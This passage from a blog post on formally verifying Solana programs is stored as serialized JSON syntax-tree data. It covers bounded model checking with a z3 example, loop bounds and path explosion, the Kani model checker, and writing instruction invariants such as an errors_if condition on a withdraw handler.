3",{"type":27,"tag":207,"props":26371,"children":26372},{"style":238},[26373],{"type":33,"value":241},{"type":27,"tag":207,"props":26375,"children":26376},{"class":209,"line":270},[26377,26381],{"type":27,"tag":207,"props":26378,"children":26379},{"style":214},[26380],{"type":33,"value":26347},{"type":27,"tag":207,"props":26382,"children":26383},{"style":238},[26384],{"type":33,"value":26385}," z;\n",{"type":27,"tag":207,"props":26387,"children":26388},{"class":209,"line":296},[26389,26393,26398,26402,26407],{"type":27,"tag":207,"props":26390,"children":26391},{"style":376},[26392],{"type":33,"value":19556},{"type":27,"tag":207,"props":26394,"children":26395},{"style":238},[26396],{"type":33,"value":26397}," (y ",{"type":27,"tag":207,"props":26399,"children":26400},{"style":226},[26401],{"type":33,"value":17739},{"type":27,"tag":207,"props":26403,"children":26404},{"style":232},[26405],{"type":33,"value":26406}," 100",{"type":27,"tag":207,"props":26408,"children":26409},{"style":238},[26410],{"type":33,"value":1424},{"type":27,"tag":207,"props":26412,"children":26413},{"class":209,"line":445},[26414,26419,26423,26427,26431,26435],{"type":27,"tag":207,"props":26415,"children":26416},{"style":238},[26417],{"type":33,"value":26418}," z ",{"type":27,"tag":207,"props":26420,"children":26421},{"style":226},[26422],{"type":33,"value":10380},{"type":27,"tag":207,"props":26424,"children":26425},{"style":238},[26426],{"type":33,"value":11797},{"type":27,"tag":207,"props":26428,"children":26429},{"style":226},[26430],{"type":33,"value":9286},{"type":27,"tag":207,"props":26432,"children":26433},{"style":232},[26434],{"type":33,"value":438},{"type":27,"tag":207,"props":26436,"children":26437},{"style":238},[26438],{"type":33,"value":241},{"type":27,"tag":207,"props":26440,"children":26441},{"class":209,"line":867},[26442,26446,26450],{"type":27,"tag":207,"props":26443,"children":26444},{"style":238},[26445],{"type":33,"value":23054},{"type":27,"tag":207,"props":26447,"children":26448},{"style":376},[26449],{"type":33,"value":10605},{"type":27,"tag":207,"props":26451,"children":26452},{"style":238},[26453],{"type":33,"value":384},{"type":27,"tag":207,"props":26455,"children":26456},{"class":209,"line":892},[26457,26461,26465,26469,26473,26477],{"type":27,"tag":207,"props":26458,"children":26459},{"style":238},[26460],{"type":33,"value":26418},{"type":27,"tag":207,"props":26462,"children":26463},{"style":226},[26464],{"type":33,"value":10380},{"type":27,"tag":207,"props":26466,"children":26467},{"style":238},[26468],{"type":33,"value":11797},{"type":27,"tag":207,"props":26470,"children":26471},{"style":226},[26472],{"type":33,"value":2227},{"type":27,"tag":207,"props":26474,"children":26475},{"style":232},[26476],{"type":33,"value":235},{"type":27,"tag":207,"props":26478,"children":26479},{"style":238},[26480],{"type":33,"value":241},{"type":27,"tag":207,"props":26482,"children":26483},{"class":209,"line":1475},[26484],{"type":27,"tag":207,"props":26485,"children":26486},{"style":238},[26487],{"type":33,"value":10645},{"type":27,"tag":207,"props":26489,"children":26490},{"class":209,"line":2065},[26491],{"type":27,"tag":207,"props":26492,"children":26493},{"emptyLinePlaceholder":19},[26494],{"type":33,"value":2062},{"type":27,"tag":207,"props":26496,"children":26497},{"class":209,"line":2092},[26498],{"type":27,"tag":207,"props":26499,"children":26500},{"style":4647},[26501],{"type":33,"value":26502}," // Property P:\n",{"type":27,"tag":207,"props":26504,"children":26505},{"class":209,"line":2130},[26506,26511,26516,26520,26525],{"type":27,"tag":207,"props":26507,"children":26508},{"style":1335},[26509],{"type":33,"value":26510}," assert",{"type":27,"tag":207,"props":26512,"children":26513},{"style":238},[26514],{"type":33,"value":26515},"(z ",{"type":27,"tag":207,"props":26517,"children":26518},{"style":226},[26519],{"type":33,"value":22963},{"type":27,"tag":207,"props":26521,"children":26522},{"style":232},[26523],{"type":33,"value":26524}," 105",{"type":27,"tag":207,"props":26526,"children":26527},{"style":238},[26528],{"type":33,"value":1455},{"type":27,"tag":207,"props":26530,"children":26531},{"class":209,"line":2168},[26532],{"type":27,"tag":207,"props":26533,"children":26534},{"style":238},[26535],{"type":33,"value":451},{"type":27,"tag":36,"props":26537,"children":26538},{},[26539,26541,26547,26549,26555],{"type":33,"value":26540},"This function takes an input ",{"type":27,"tag":84,"props":26542,"children":26544},{"className":26543},[],[26545],{"type":33,"value":26546},"x",{"type":33,"value":26548}," and does some computation. At the end of the program, the property we want to verify is that ",{"type":27,"tag":84,"props":26550,"children":26552},{"className":26551},[],[26553],{"type":33,"value":26554},"z != 105",{"type":33,"value":1041},{"type":27,"tag":36,"props":26557,"children":26558},{},[26559],{"type":33,"value":26560},"With BMC, we could trace this program and derive the following constraints:",{"type":27,"tag":36,"props":26562,"children":26563},{},[26564],{"type":33,"value":26565},"Positive branch:",{"type":27,"tag":101,"props":26567,"children":26569},{"code":26568,"language":10435,"meta":7,"className":23789,"style":7},"y == x + 3\ny > 100\nz == y * 2\n",[26570],{"type":27,"tag":84,"props":26571,"children":26572},{"__ignoreMap":7},[26573,26598,26614],{"type":27,"tag":207,"props":26574,"children":26575},{"class":209,"line":210},[26576,26581,26585,26589,26593],{"type":27,"tag":207,"props":26577,"children":26578},{"style":238},[26579],{"type":33,"value":26580},"y ",{"type":27,"tag":207,"props":26582,"children":26583},{"style":226},[26584],{"type":33,"value":15856},{"type":27,"tag":207,"props":26586,"children":26587},{"style":238},[26588],{"type":33,"value":26360},{"type":27,"tag":207,"props":26590,"children":26591},{"style":226},[26592],{"type":33,"value":2227},{"type":27,"tag":207,"props":26594,"children":26595},{"style":232},[26596],{"type":33,"value":26597}," 3\n",{"type":27,"tag":207,"props":26599,"children":26600},{"class":209,"line":244},[26601,26605,26609],{"type":27,"tag":207,"props":26602,"children":26603},{"style":238},[26604],{"type":33,"value":26580},{"type":27,"tag":207,"props":26606,"children":26607},{"style":226},[26608],{"type":33,"value":17739},{"type":27,"tag":207,"props":26610,"children":26611},{"style":232},[26612],{"type":33,"value":26613}," 100\n",{"type":27,"tag":207,"props":26615,"children":26616},{"class":209,"line":270},[26617,26622,26626,26630,26634],{"type":27,"tag":207,"props":26618,"children":26619},{"style":238},[26620],{"type":33,"value":26621},"z ",{"type":27,"tag":207,"props":26623,"children":26624},{"style":226},[26625],{"type":33,"value":15856},{"type":27,"tag":207,"props":26627,"children":26628},{"style":238},[26629],{"type":33,"value":11797},{"type":27,"tag":207,"props":26631,"children":26632},{"style":226},[26633],{"type":33,"value":9286},{"type":27,"tag":207,"props":26635,"children":26636},{"style":232},[26637],{"type":33,"value":26638}," 2\n",{"type":27,"tag":36,"props":26640,"children":26641},{},[26642],{"type":33,"value":26643},"Negative branch:",{"type":27,"tag":101,"props":26645,"children":26647},{"code":26646,"language":10435,"meta":7,"className":23789,"style":7},"y == x + 3\ny \u003C= 100\nz == y + 1\n",[26648],{"type":27,"tag":84,"props":26649,"children":26650},{"__ignoreMap":7},[26651,26674,26690],{"type":27,"tag":207,"props":26652,"children":26653},{"class":209,"line":210},[26654,26658,26662,26666,26670],{"type":27,"tag":207,"props":26655,"children":26656},{"style":238},[26657],{"type":33,"value":26580},{"type":27,"tag":207,"props":26659,"children":26660},{"style":226},[26661],{"type":33,"value":15856},{"type":27,"tag":207,"props":26663,"children":26664},{"style":238},[26665],{"type":33,"value":26360},{"type":27,"tag":207,"props":26667,"children":26668},{"style":226},[26669],{"type":33,"value":2227},{"type":27,"tag":207,"props":26671,"children":26672},{"style":232},[26673],{"type":33,"value":26597},{"type":27,"tag":207,"props":26675,"children":26676},{"class":209,"line":244},[26677,26681,26686],{"type":27,"tag":207,"props":26678,"children":26679},{"style":238},[26680],{"type":33,"value":26580},{"type":27,"tag":207,"props":26682,"children":26683},{"style":226},[26684],{"type":33,"value":26685},"\u003C=",{"type":27,"tag":207,"props":26687,"children":26688},{"style":232},[26689],{"type":33,"value":26613},{"type":27,"tag":207,"props":26691,"children":26692},{"class":209,"line":270},[26693,26697,26701,26705,26709],{"type":27,"tag":207,"props":26694,"children":26695},{"style":238},[26696],{"type":33,"value":26621},{"type":27,"tag":207,"props":26698,"children":26699},{"style":226},[26700],{"type":33,"value":15856},{"type":27,"tag":207,"props":26702,"children":26703},{"style":238},[26704],{"type":33,"value":11797},{"type":27,"tag":207,"props":26706,"children":26707},{"style":226},[26708],{"type":33,"value":2227},{"type":27,"tag":207,"props":26710,"children":26711},{"style":232},[26712],{"type":33,"value":26713}," 1\n",{"type":27,"tag":36,"props":26715,"children":26716},{},[26717,26719,26726],{"type":33,"value":26718},"Using the ",{"type":27,"tag":47,"props":26720,"children":26723},{"href":26721,"rel":26722},"https://github.com/Z3Prover/z3",[51],[26724],{"type":33,"value":26725},"z3",{"type":33,"value":26727}," SMT solver, we could check both of these cases like so:",{"type":27,"tag":101,"props":26729,"children":26733},{"code":26730,"language":26731,"meta":7,"className":26732,"style":7},"from z3 import *\n\nx = Int('x')\ny = Int('y')\nz = Int('z')\n\n# Positive branch:\ns = Solver()\ns.add(y == x + 3)\ns.add(y > 100)\ns.add(z == y * 2)\n\n# check if we can violate the correctness property\ns.add(Not(z != 105))\nprint(s.check()) # \"unsat\"\n\n# Negative branch:\ns = Solver()\ns.add(y == x + 3)\ns.add(y \u003C= 100)\ns.add(z == y + 1)\n\n# check if we can violate the correctness property\ns.add(Not(z != 105))\nprint(s.check()) # \"unsat\"\n","python","language-python shiki shiki-themes slack-dark",[26734],{"type":27,"tag":84,"props":26735,"children":26736},{"__ignoreMap":7},[26737,26760,26767,26793,26817,26841,26848,26856,26873,26901,26920,26948,26955,26963,26984,27002,27009,27017,27032,27059,27078,27105,27112,27119,27138],{"type":27,"tag":207,"props":26738,"children":26739},{"class":209,"line":210},[26740,26745,26750,26755],{"type":27,"tag":207,"props":26741,"children":26742},{"style":376},[26743],{"type":33,"value":26744},"from",{"type":27,"tag":207,"props":26746,"children":26747},{"style":238},[26748],{"type":33,"value":26749}," z3 ",{"type":27,"tag":207,"props":26751,"children":26752},{"style":376},[26753],{"type":33,"value":26754},"import",{"type":27,"tag":207,"props":26756,"children":26757},{"style":226},[26758],{"type":33,"value":26759}," *\n",{"type":27,"tag":207,"props":26761,"children":26762},{"class":209,"line":244},[26763],{"type":27,"tag":207,"props":26764,"children":26765},{"emptyLinePlaceholder":19},[26766],{"type":33,"value":2062},{"type":27,"tag":207,"props":26768,"children":26769},{"class":209,"line":270},[26770,26775,26779,26784,26789],{"type":27,"tag":207,"props":26771,"children":26772},{"style":238},[26773],{"type":33,"value":26774},"x ",{"type":27,"tag":207,"props":26776,"children":26777},{"style":226},[26778],{"type":33,"value":10380},{"type":27,"tag":207,"props":26780,"children":26781},{"style":238},[26782],{"type":33,"value":26783}," Int(",{"type":27,"tag":207,"props":26785,"children":26786},{"style":1325},[26787],{"type":33,"value":26788},"'x'",{"type":27,"tag":207,"props":26790,"children":26791},{"style":238},[26792],{"type":33,"value":10449},{"type":27,"tag":207,"props":26794,"children":26795},{"class":209,"line":296},[26796,26800,26804,26808,26813],{"type":27,"tag":207,"props":26797,"children":26798},{"style":238},[26799],{"type":33,"value":26580},{"type":27,"tag":207,"props":26801,"children":26802},{"style":226},[26803],{"type":33,"value":10380},{"type":27,"tag":207,"props":26805,"children":26806},{"style":238},[26807],{"type":33,"value":26783},{"type":27,"tag":207,"props":26809,"children":26810},{"style":1325},[26811],{"type":33,"value":26812},"'y'",{"type":27,"tag":207,"props":26814,"children":26815},{"style":238},[26816],{"type":33,"value":10449},{"type":27,"tag":207,"props":26818,"children":26819},{"class":209,"line":445},[26820,26824,26828,26832,26837],{"type":27,"tag":207,"props":26821,"children":26822},{"style":238},[26823],{"type":33,"value":26621},{"type":27,"tag":207,"props":26825,"children":26826},{"style":226},[26827],{"type":33,"value":10380},{"type":27,"tag":207,"props":26829,"children":26830},{"style":238},[26831],{"type":33,"value":26783},{"type":27,"tag":207,"props":26833,"children":26834},{"style":1325},[26835],{"type":33,"value":26836},"'z'",{"type":27,"tag":207,"props":26838,"children":26839},{"style":238},[26840],{"type":33,"value":10449},{"type":27,"tag":207,"props":26842,"children":26843},{"class":209,"line":867},[26844],{"type":27,"tag":207,"props":26845,"children":26846},{"emptyLinePlaceholder":19},[26847],{"type":33,"value":2062},{"type":27,"tag":207,"props":26849,"children":26850},{"class":209,"line":892},[26851],{"type":27,"tag":207,"props":26852,"children":26853},{"style":4647},[26854],{"type":33,"value":26855},"# Positive branch:\n",{"type":27,"tag":207,"props":26857,"children":26858},{"class":209,"line":1475},[26859,26864,26868],{"type":27,"tag":207,"props":26860,"children":26861},{"style":238},[26862],{"type":33,"value":26863},"s ",{"type":27,"tag":207,"props":26865,"children":26866},{"style":226},[26867],{"type":33,"value":10380},{"type":27,"tag":207,"props":26869,"children":26870},{"style":238},[26871],{"type":33,"value":26872}," Solver()\n",{"type":27,"tag":207,"props":26874,"children":26875},{"class":209,"line":2065},[26876,26881,26885,26889,26893,26897],{"type":27,"tag":207,"props":26877,"children":26878},{"style":238},[26879],{"type":33,"value":26880},"s.add(y ",{"type":27,"tag":207,"props":26882,"children":26883},{"style":226},[26884],{"type":33,"value":15856},{"type":27,"tag":207,"props":26886,"children":26887},{"style":238},[26888],{"type":33,"value":26360},{"type":27,"tag":207,"props":26890,"children":26891},{"style":226},[26892],{"type":33,"value":2227},{"type":27,"tag":207,"props":26894,"children":26895},{"style":232},[26896],{"type":33,"value":26369},{"type":27,"tag":207,"props":26898,"children":26899},{"style":238},[26900],{"type":33,"value":10449},{"type":27,"tag":207,"props":26902,"children":26903},{"class":209,"line":2092},[26904,26908,26912,26916],{"type":27,"tag":207,"props":26905,"children":26906},{"style":238},[26907],{"type":33,"value":26880},{"type":27,"tag":207,"props":26909,"children":26910},{"style":226},[26911],{"type":33,"value":17739},{"type":27,"tag":207,"props":26913,"children":26914},{"style":232},[26915],{"type":33,"value":26406},{"type":27,"tag":207,"props":26917,"children":26918},{"style":238},[26919],{"type":33,"value":10449},{"type":27,"tag":207,"props":26921,"children":26922},{"class":209,"line":2130},[26923,26928,26932,26936,26940,26944],{"type":27,"tag":207,"props":26924,"children":26925},{"style":238},[26926],{"type":33,"value":26927},"s.add(z ",{"type":27,"tag":207,"props":26929,"children":26930},{"style":226},[26931],{"type":33,"value":15856},{"type":27,"tag":207,"props":26933,"children":26934},{"style":238},[26935],{"type":33,"value":11797},{"type":27,"tag":207,"props":26937,"children":26938},{"style":226},[26939],{"type":33,"value":9286},{"type":27,"tag":207,"props":26941,"children":26942},{"style":232},[26943],{"type":33,"value":438},{"type":27,"tag":207,"props":26945,"children":26946},{"style":238},[26947],{"type":33,"value":10449},{"type":27,"tag":207,"props":26949,"children":26950},{"class":209,"line":2168},[26951],{"type":27,"tag":207,"props":26952,"children":26953},{"emptyLinePlaceholder":19},[26954],{"type":33,"value":2062},{"type":27,"tag":207,"props":26956,"children":26957},{"class":209,"line":4095},[26958],{"type":27,"tag":207,"props":26959,"children":26960},{"style":4647},[26961],{"type":33,"value":26962},"# check if we can violate the correctness property\n",{"type":27,"tag":207,"props":26964,"children":26965},{"class":209,"line":4103},[26966,26971,26975,26979],{"type":27,"tag":207,"props":26967,"children":26968},{"style":238},[26969],{"type":33,"value":26970},"s.add(Not(z ",{"type":27,"tag":207,"props":26972,"children":26973},{"style":226},[26974],{"type":33,"value":22963},{"type":27,"tag":207,"props":26976,"children":26977},{"style":232},[26978],{"type":33,"value":26524},{"type":27,"tag":207,"props":26980,"children":26981},{"style":238},[26982],{"type":33,"value":26983},"))\n",{"type":27,"tag":207,"props":26985,"children":26986},{"class":209,"line":4154},[26987,26992,26997],{"type":27,"tag":207,"props":26988,"children":26989},{"style":1335},[26990],{"type":33,"value":26991},"print",{"type":27,"tag":207,"props":26993,"children":26994},{"style":238},[26995],{"type":33,"value":26996},"(s.check()) ",{"type":27,"tag":207,"props":26998,"children":26999},{"style":4647},[27000],{"type":33,"value":27001},"# \"unsat\"\n",{"type":27,"tag":207,"props":27003,"children":27004},{"class":209,"line":4203},[27005],{"type":27,"tag":207,"props":27006,"children":27007},{"emptyLinePlaceholder":19},[27008],{"type":33,"value":2062},{"type":27,"tag":207,"props":27010,"children":27011},{"class":209,"line":4249},[27012],{"type":27,"tag":207,"props":27013,"children":27014},{"style":4647},[27015],{"type":33,"value":27016},"# Negative branch:\n",{"type":27,"tag":207,"props":27018,"children":27019},{"class":209,"line":4290},[27020,27024,27028],{"type":27,"tag":207,"props":27021,"children":27022},{"style":238},[27023],{"type":33,"value":26863},{"type":27,"tag":207,"props":27025,"children":27026},{"style":226},[27027],{"type":33,"value":10380},{"type":27,"tag":207,"props":27029,"children":27030},{"style":238},[27031],{"type":33,"value":26872},{"type":27,"tag":207,"props":27033,"children":27034},{"class":209,"line":4304},[27035,27039,27043,27047,27051,27055],{"type":27,"tag":207,"props":27036,"children":27037},{"style":238},[27038],{"type":33,"value":26880},{"type":27,"tag":207,"props":27040,"children":27041},{"style":226},[27042],{"type":33,"value":15856},{"type":27,"tag":207,"props":27044,"children":27045},{"style":238},[27046],{"type":33,"value":26360},{"type":27,"tag":207,"props":27048,"children":27049},{"style":226},[27050],{"type":33,"value":2227},{"type":27,"tag":207,"props":27052,"children":27053},{"style":232},[27054],{"type":33,"value":26369},{"type":27,"tag":207,"props":27056,"children":27057},{"style":238},[27058],{"type":33,"value":10449},{"type":27,"tag":207,"props":27060,"children":27061},{"class":209,"line":5466},[27062,27066,27070,27074],{"type":27,"tag":207,"props":27063,"children":27064},{"style":238},[27065],{"type":33,"value":26880},{"type":27,"tag":207,"props":27067,"children":27068},{"style":226},[27069],{"type":33,"value":26685},{"type":27,"tag":207,"props":27071,"children":27072},{"style":232},[27073],{"type":33,"value":26406},{"type":27,"tag":207,"props":27075,"children":27076},{"style":238},[27077],{"type":33,"value":10449},{"type":27,"tag":207,"props":27079,"children":27080},{"class":209,"line":5530},[27081,27085,27089,27093,27097,27101],{"type":27,"tag":207,"props":27082,"children":27083},{"style":238},[27084],{"type":33,"value":26927},{"type":27,"tag":207,"props":27086,"children":27087},{"style":226},[27088],{"type":33,"value":15856},{"type":27,"tag":207,"props":27090,"children":27091},{"style":238},[27092],{"type":33,"value":11797},{"type":27,"tag":207,"props":27094,"children":27095},{"style":226},[27096],{"type":33,"value":2227},{"type":27,"tag":207,"props":27098,"children":27099},{"style":232},[27100],{"type":33,"value":235},{"type":27,"tag":207,"props":27102,"children":27103},{"style":238},[27104],{"type":33,"value":10449},{"type":27,"tag":207,"props":27106,"children":27107},{"class":209,"line":7900},[27108],{"type":27,"tag":207,"props":27109,"children":27110},{"emptyLinePlaceholder":19},[27111],{"type":33,"value":2062},{"type":27,"tag":207,"props":27113,"children":27114},{"class":209,"line":7909},[27115],{"type":27,"tag":207,"props":27116,"children":27117},{"style":4647},[27118],{"type":33,"value":26962},{"type":27,"tag":207,"props":27120,"children":27121},{"class":209,"line":7917},[27122,27126,27130,27134],{"type":27,"tag":207,"props":27123,"children":27124},{"style":238},[27125],{"type":33,"value":26970},{"type":27,"tag":207,"props":27127,"children":27128},{"style":226},[27129],{"type":33,"value":22963},{"type":27,"tag":207,"props":27131,"children":27132},{"style":232},[27133],{"type":33,"value":26524},{"type":27,"tag":207,"props":27135,"children":27136},{"style":238},[27137],{"type":33,"value":26983},{"type":27,"tag":207,"props":27139,"children":27140},{"class":209,"line":7926},[27141,27145,27149],{"type":27,"tag":207,"props":27142,"children":27143},{"style":1335},[27144],{"type":33,"value":26991},{"type":27,"tag":207,"props":27146,"children":27147},{"style":238},[27148],{"type":33,"value":26996},{"type":27,"tag":207,"props":27150,"children":27151},{"style":4647},[27152],{"type":33,"value":27001},{"type":27,"tag":36,"props":27154,"children":27155},{},[27156,27158,27164,27166,27171],{"type":33,"value":27157},"Both of these cases return ",{"type":27,"tag":84,"props":27159,"children":27161},{"className":27160},[],[27162],{"type":33,"value":27163},"unsat",{"type":33,"value":27165}," meaning z3 could not find a way to violate the correctness property, hence our program is ",{"type":27,"tag":942,"props":27167,"children":27168},{},[27169],{"type":33,"value":27170},"correct",{"type":33,"value":27172}," according to this property.",{"type":27,"tag":58,"props":27174,"children":27176},{"id":27175},"loop-bounds-path-explosion",[27177],{"type":33,"value":27178},"Loop bounds & path explosion",{"type":27,"tag":36,"props":27180,"children":27181},{},[27182,27184,27189,27191,27196],{"type":33,"value":27183},"As you may have noticed, BMC requires us to take ",{"type":27,"tag":942,"props":27185,"children":27186},{},[27187],{"type":33,"value":27188},"every",{"type":33,"value":27190}," branch in the program. To be sure that our property holds, we need to check every possible route through the program. If we have 10 branches in a row we might need to test 2^10 paths! And if our program has loops, we may need to check an ",{"type":27,"tag":942,"props":27192,"children":27193},{},[27194],{"type":33,"value":27195},"infinite",{"type":33,"value":27197}," number of paths because the loop branches backward. This might take a while...",{"type":27,"tag":36,"props":27199,"children":27200},{},[27201],{"type":33,"value":27202},"This is where the \"bounded\" part of \"bounded model checking\" applies. Rather than unroll an infinite number of loops, we can set a loop bound and also verify that it is not possible to loop more than the loop bound.",{"type":27,"tag":36,"props":27204,"children":27205},{},[27206],{"type":33,"value":27207},"While this technique of bounding loops makes the problem tractable. It is still expensive to run BMC on very large programs due to the problem of path explosion. As our program gets larger, the number of possible paths scales potentially exponentially.",{"type":27,"tag":36,"props":27209,"children":27210},{},[27211],{"type":33,"value":27212},"One of the main challenges we will discuss later is how to address this problem of path explosion in the context of Solana Rust programs.",{"type":27,"tag":58,"props":27214,"children":27216},{"id":27215},"kani-model-checker",[27217],{"type":33,"value":27218},"Kani Model Checker",{"type":27,"tag":36,"props":27220,"children":27221},{},[27222,27224,27229],{"type":33,"value":27223},"For our research with formally verifying Solana programs, we are using the ",{"type":27,"tag":47,"props":27225,"children":27227},{"href":26117,"rel":27226},[51],[27228],{"type":33,"value":26121},{"type":33,"value":27230},": an open-source, bit-precise model checker for Rust created at AWS. Under the hood, Kani uses the C Bounded Model Checker (CBMC) to do the heavy lifting.",{"type":27,"tag":36,"props":27232,"children":27233},{},[27234,27236,27241,27243,27249,27250,27256,27258,27264],{"type":33,"value":27235},"Kani allows you to write ",{"type":27,"tag":942,"props":27237,"children":27238},{},[27239],{"type":33,"value":27240},"proof harnesses",{"type":33,"value":27242}," which can invoke Rust functions with symbolic values. These harnesses can ",{"type":27,"tag":84,"props":27244,"children":27246},{"className":27245},[],[27247],{"type":33,"value":27248},"assume",{"type":33,"value":1131},{"type":27,"tag":84,"props":27251,"children":27253},{"className":27252},[],[27254],{"type":33,"value":27255},"assert",{"type":33,"value":27257}," certain conditions about these symbolic values and then you can verify that a proof harness holds via the ",{"type":27,"tag":84,"props":27259,"children":27261},{"className":27260},[],[27262],{"type":33,"value":27263},"cargo kani",{"type":33,"value":27265}," tool (which compiles your proof harness and runs BMC).",{"type":27,"tag":28,"props":27267,"children":27269},{"id":27268},"specification-how-can-we-describe-what-we-want-our-program-to-do",[27270,27272,27276],{"type":33,"value":27271},"Specification: How can we describe what we ",{"type":27,"tag":942,"props":27273,"children":27274},{},[27275],{"type":33,"value":26191},{"type":33,"value":26193},{"type":27,"tag":36,"props":27278,"children":27279},{},[27280],{"type":27,"tag":942,"props":27281,"children":27282},{},[27283],{"type":27,"tag":12606,"props":27284,"children":27285},{},[27286],{"type":33,"value":27287},"And what even do we want it to do?",{"type":27,"tag":36,"props":27289,"children":27290},{},[27291,27293,27298],{"type":33,"value":27292},"A fundamental challenge with any formal verification framework is ",{"type":27,"tag":942,"props":27294,"children":27295},{},[27296],{"type":33,"value":27297},"specifying",{"type":33,"value":27299}," what the \"correct\" behavior should be.",{"type":27,"tag":36,"props":27301,"children":27302},{},[27303],{"type":33,"value":27304},"In natural language, we can describe a few good properties for example Solana programs:",{"type":27,"tag":1228,"props":27306,"children":27307},{},[27308,27320,27332],{"type":27,"tag":1232,"props":27309,"children":27310},{},[27311,27313,27318],{"type":33,"value":27312},"\"It should not be possible to ",{"type":27,"tag":12606,"props":27314,"children":27315},{},[27316],{"type":33,"value":27317},"steal money",{"type":33,"value":27319}," via a swap program\"",{"type":27,"tag":1232,"props":27321,"children":27322},{},[27323,27325,27330],{"type":33,"value":27324},"\"A multisig should never get into a state where you ",{"type":27,"tag":12606,"props":27326,"children":27327},{},[27328],{"type":33,"value":27329},"can't sign anything",{"type":33,"value":27331},"\"",{"type":27,"tag":1232,"props":27333,"children":27334},{},[27335],{"type":33,"value":27336},"\"User funds in a staking protocol \"",{"type":27,"tag":36,"props":27338,"children":27339},{},[27340,27342,27352,27354,27359],{"type":33,"value":27341},"These are types of properties you can tell your ",{"type":27,"tag":47,"props":27343,"children":27346},{"href":27344,"rel":27345},"https://osec.io/",[51],[27347],{"type":27,"tag":942,"props":27348,"children":27349},{},[27350],{"type":33,"value":27351},"human auditors",{"type":33,"value":27353}," but these English phrases are not particularly useful for ",{"type":27,"tag":942,"props":27355,"children":27356},{},[27357],{"type":33,"value":27358},"automated verification techniques",{"type":33,"value":27360}," (at least until our AI overlords surpass human intelligence).",{"type":27,"tag":36,"props":27362,"children":27363},{},[27364,27366,27371,27373,27378],{"type":33,"value":27365},"Instead, we need to be able to specify ",{"type":27,"tag":942,"props":27367,"children":27368},{},[27369],{"type":33,"value":27370},"in code",{"type":33,"value":27372}," what properties we want to check. Ideally, we could define invariants that fit nicely into something like an ",{"type":27,"tag":84,"props":27374,"children":27376},{"className":27375},[],[27377],{"type":33,"value":27255},{"type":33,"value":27379}," statement.",{"type":27,"tag":58,"props":27381,"children":27383},{"id":27382},"solana-invariants",[27384],{"type":33,"value":27385},"Solana Invariants",{"type":27,"tag":36,"props":27387,"children":27388},{},[27389,27391,27396,27397,27402],{"type":33,"value":27390},"In the context of Solana programs we define two different types of properties that we would like to verify: ",{"type":27,"tag":12606,"props":27392,"children":27393},{},[27394],{"type":33,"value":27395},"instruction invariants",{"type":33,"value":1131},{"type":27,"tag":12606,"props":27398,"children":27399},{},[27400],{"type":33,"value":27401},"account invariants",{"type":33,"value":1041},{"type":27,"tag":26163,"props":27404,"children":27406},{"id":27405},"instruction-invariant",[27407],{"type":33,"value":27408},"Instruction Invariant",{"type":27,"tag":36,"props":27410,"children":27411},{},[27412,27414,27419,27421,27427,27428,27434],{"type":33,"value":27413},"An ",{"type":27,"tag":12606,"props":27415,"children":27416},{},[27417],{"type":33,"value":27418},"instruction invariant",{"type":33,"value":27420}," specifies sufficient conditions for an instruction to succeed (or fail). These are specified as ",{"type":27,"tag":84,"props":27422,"children":27424},{"className":27423},[],[27425],{"type":33,"value":27426},"succeeds_if",{"type":33,"value":20411},{"type":27,"tag":84,"props":27429,"children":27431},{"className":27430},[],[27432],{"type":33,"value":27433},"errors_if",{"type":33,"value":27435}," macro annotations on the instruction handler.",{"type":27,"tag":36,"props":27437,"children":27438},{},[27439],{"type":33,"value":27440},"In Solana, when an instruction fails, the entire transaction is reverted. Failing an instruction on purpose is commonly used as a form of access control; invalid accounts, bad state, etc... will cause an instruction to fail and get reverted.",{"type":27,"tag":36,"props":27442,"children":27443},{},[27444,27446,27452,27454,27459],{"type":33,"value":27445},"For example, say we have a ",{"type":27,"tag":84,"props":27447,"children":27449},{"className":27448},[],[27450],{"type":33,"value":27451},"Withdraw",{"type":33,"value":27453}," instruction that lets a user withdraw some tokens. A security critical property we may want to verify is that the user cannot withdraw ",{"type":27,"tag":942,"props":27455,"children":27456},{},[27457],{"type":33,"value":27458},"more",{"type":33,"value":27460}," tokens than their current balance.",{"type":27,"tag":36,"props":27462,"children":27463},{},[27464,27466,27471],{"type":33,"value":27465},"Using our tool, you could specify the following ",{"type":27,"tag":84,"props":27467,"children":27469},{"className":27468},[],[27470],{"type":33,"value":27433},{"type":33,"value":27472}," property on your instruction handler:",{"type":27,"tag":101,"props":27474,"children":27476},{"code":27475,"language":10269,"meta":7,"className":10270,"style":7},"#[errors_if(\n ctx.user.balance \u003C amount\n)]\nfn withdraw(ctx: Context\u003CWithdraw>, amount: u64) -> Result\u003C()> {\n ...\n}\n",[27477],{"type":27,"tag":84,"props":27478,"children":27479},{"__ignoreMap":7},[27480,27488,27523,27531,27604,27612],{"type":27,"tag":207,"props":27481,"children":27482},{"class":209,"line":210},[27483],{"type":27,"tag":207,"props":27484,"children":27485},{"style":238},[27486],{"type":33,"value":27487},"#[errors_if(\n",{"type":27,"tag":207,"props":27489,"children":27490},{"class":209,"line":244},[27491,27496,27500,27505,27509,27514,27518],{"type":27,"tag":207,"props":27492,"children":27493},{"style":238},[27494],{"type":33,"value":27495}," ctx",{"type":27,"tag":207,"props":27497,"children":27498},{"style":226},[27499],{"type":33,"value":1041},{"type":27,"tag":207,"props":27501,"children":27502},{"style":238},[27503],{"type":33,"value":27504},"user",{"type":27,"tag":207,"props":27506,"children":27507},{"style":226},[27508],{"type":33,"value":1041},{"type":27,"tag":207,"props":27510,"children":27511},{"style":238},[27512],{"type":33,"value":27513},"balance ",{"type":27,"tag":207,"props":27515,"children":27516},{"style":226},[27517],{"type":33,"value":9257},{"type":27,"tag":207,"props":27519,"children":27520},{"style":238},[27521],{"type":33,"value":27522}," amount\n",{"type":27,"tag":207,"props":27524,"children":27525},{"class":209,"line":270},[27526],{"type":27,"tag":207,"props":27527,"children":27528},{"style":238},[27529],{"type":33,"value":27530},")]\n",{"type":27,"tag":207,"props":27532,"children":27533},{"class":209,"line":296},[27534,27539,27544,27548,27553,27557,27562,27566,27570,27574,27579,27583,27587,27591,27595,27599],{"type":27,"tag":207,"props":27535,"children":27536},{"style":214},[27537],{"type":33,"value":27538},"fn",{"type":27,"tag":207,"props":27540,"children":27541},{"style":1335},[27542],{"type":33,"value":27543}," 